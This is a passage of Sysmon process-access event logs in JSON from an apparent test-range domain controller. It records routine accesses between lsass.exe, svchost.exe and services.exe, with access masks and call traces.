C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.372","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001015C40000}","TargetProcessId":"1196","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1221,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.372\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nTargetProcessId: 1196\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.372","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001015C40000}","TargetProcessId":"1196","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1222,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.372\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.372","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1223,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.372\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.372","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1224,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.373\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.373","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1225,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.373\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.373","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1226,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.373\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.373","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1227,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.373\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.373","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1228,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.373\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 